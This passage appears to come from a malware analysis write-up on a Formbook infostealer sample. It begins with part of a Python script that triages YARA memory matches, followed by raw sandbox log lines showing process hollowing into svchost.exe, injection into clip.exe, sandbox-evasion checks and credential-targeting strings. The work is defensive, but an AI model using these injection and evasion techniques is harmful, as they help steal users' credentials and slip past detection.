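    rec = {"source": src, "kind": kind, "rule": rule, "meta": parse_meta(meta)}
    d = SDMP_RE.match(src)
    if d:
        proc, _stage, _seq, base, prot, _f6, mtype, _f8 = d.groups()
        rec.update(proc=int(proc), base=int(base, 16),
                   protect=PAGE_PROTECT.get(int(prot, 16), "0x" + prot),
                   memtype=MEM_TYPE.get(int(mtype, 16), "0x" + mtype))
    u = UNPACK_RE.match(src)
    if u:
        proc, _stage, image, base, _n, _raw = u.groups()
        rec.update(proc=int(proc), base=int(base, 16), image=image, protect="", memtype="")
    return rec


def triage(lines):
    """Per process index: rules seen, distinct regions (base, protection, type), W+X regions."""
    by_proc = defaultdict(list)
    for line in lines:
        rec = parse_row(line)
        if rec and "proc" in rec:
            by_proc[rec["proc"]].append(rec)
    summary = {}
    for proc, recs in sorted(by_proc.items()):
        summary[proc] = {
            "rules": sorted({r["rule"] for r in recs}),
            "regions": sorted({(r["base"], r["protect"], r["memtype"]) for r in recs}),
            "wx_regions": sorted({r["base"] for r in recs
                                  if r["protect"] == "PAGE_EXECUTE_READWRITE"}),
        }
    return summary


# The ten match rows of this report, rebuilt with the metadata shortened to the keys used here.
META = ("reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, "
        "os = windows, threat_name = Windows.Trojan.Formbook, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8")
SOURCES = [
    ("2.2.svchost.exe.400000.0.unpack", "UNPACKEDPE"),
    ("2.2.svchost.exe.400000.0.raw.unpack", "UNPACKEDPE"),
    ("00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp", "MEMORY"),
    ("00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp", "MEMORY"),
    ("00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp", "MEMORY"),
    ("00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp", "MEMORY"),
    ("00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp", "MEMORY"),
    ("00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp", "MEMORY"),
    ("00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp", "MEMORY"),
    ("00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp", "MEMORY"),
]
REPORT_ROWS = [f"Source: {s}, type: {k}Matched rule: Windows_Trojan_Formbook_1112e116 {META}"
               for s, k in SOURCES]

if __name__ == "__main__":
    for proc, info in triage(REPORT_ROWS).items():
        print(proc, info["rules"], [hex(b) for b in info["wx_regions"]])
```

With this reading every process index that matched (2, 4, 5 and 8) holds at least one PAGE_EXECUTE_READWRITE region, and in process 2 the match at 0x400000 coincides with the base of the unpacked svchost.exe image, which is the shape a hollowed process leaves behind. The two PAGE_READWRITE private regions in process 5 are the only non-executable hits.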
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@10/9
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A337B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A210BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A4A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A3648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | File created: C:\Users\user\AppData\Local\Temp\aut2D45.tmp
Source: plZuPtZoTk.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: clip.exe, 00000005.00000003.2098089927.0000000000700000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3281277788.000000000070B000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3281277788.000000000072F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3281277788.0000000000700000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: plZuPtZoTk.exe | Virustotal: Detection: 37%
Source: plZuPtZoTk.exe | ReversingLabs: Detection: 65%
Source: unknown | Process created: C:\Users\user\Desktop\plZuPtZoTk.exe "C:\Users\user\Desktop\plZuPtZoTk.exe"
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\plZuPtZoTk.exe"
Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\clip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: plZuPtZoTk.exeStatic file information: File size 1272832 > 1048576
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: plZuPtZoTk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GtDTOqzvEb.exe, 00000004.00000002.3281125755.000000000066E000.00000002.00000001.01000000.00000005.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982113880.000000000066E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
            Source: plZuPtZoTk.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: plZuPtZoTk.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: plZuPtZoTk.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: plZuPtZoTk.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: plZuPtZoTk.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_009C42DE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009E0A76 push ecx; ret 0_2_009E0A89
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040205A push esi; retf 2_2_00402076
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041405F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402026 push ecx; retf 2_2_0040202D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401888 pushfd ; ret 2_2_004018D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041409F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004139CC push ebx; retf 2_2_004139CF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042327B pushfd ; retf 2_2_00423286
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417AC3 push 00000045h; iretd 2_2_00417ACA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004032D0 push eax; ret 2_2_004032D2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00407307 push esp; ret 2_2_00407310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EC43 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A450 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EC35 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004084CC pushad ; iretd 2_2_004084CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401CDD push ecx; retf 2_2_00401CDE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A4A7 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004186E8 push BC462628h; iretd 2_2_00418778
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418699 push ecx; ret 2_2_004186E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418699 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418779 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E7AC push ebx; iretd 2_2_0041E7AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx 2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0283D push eax; iretd 2_2_03B02858
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe Code function: 4_2_04E92493 push esp; ret 4_2_04E9249C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe Code function: 4_2_04EA2C41 push 00000045h; iretd 4_2_04EA2C56
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe Code function: 4_2_04EA2C57 push 00000045h; iretd 4_2_04EA2C56
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe Code function: 4_2_04EAE407 pushfd ; retf 4_2_04EAE412
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe Code function: 4_2_04EA9DC1 push edi; ret 4_2_04EA9DDB
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_009DF98E
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A51C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00A51C41
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-96978)
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe API/Special instruction interceptor: Address: 16E2DFC
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe API coverage: 3.8 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exe API coverage: 2.8 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 4496 Thread sleep count: 37 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 4496 Thread sleep time: -74000s >= -30000s
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe TID: 4628 Thread sleep time: -50000s >= -30000s
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe TID: 4628 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A2DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00A2DBBE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009FC2A2 FindFirstFileExW, 0_2_009FC2A2
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A368EE FindFirstFileW,FindClose, 0_2_00A368EE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A3698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00A3698F
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A2D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00A2D076
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A2D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00A2D3A9
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A39642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00A39642
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A3979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00A3979D
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A39B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00A39B2B
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A35C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00A35C97
            Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_0034C0F0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0034C0F0
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_009C42DE
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n PasswordVMware20,11696494690x
            Source: 5-19-2H.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: discord.comVMware20,11696494690f
            Source: 5-19-2H.5.dr Binary or memory string: AMC password management pageVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: 5-19-2H.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 5-19-2H.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 5-19-2H.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l.comVMware20,11696494690h
            Source: 5-19-2H.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 5-19-2H.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 5-19-2H.5.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 5-19-2H.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
            Source: GtDTOqzvEb.exe, 00000008.00000002.3282813275.000000000082F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,116
            Source: 5-19-2H.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 5-19-2H.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: 5-19-2H.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: firefox.exe, 0000000A.00000002.2208006753.0000023F84EFC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 5-19-2H.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: 5-19-2H.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 5-19-2H.5.dr Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494
            Source: 5-19-2H.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
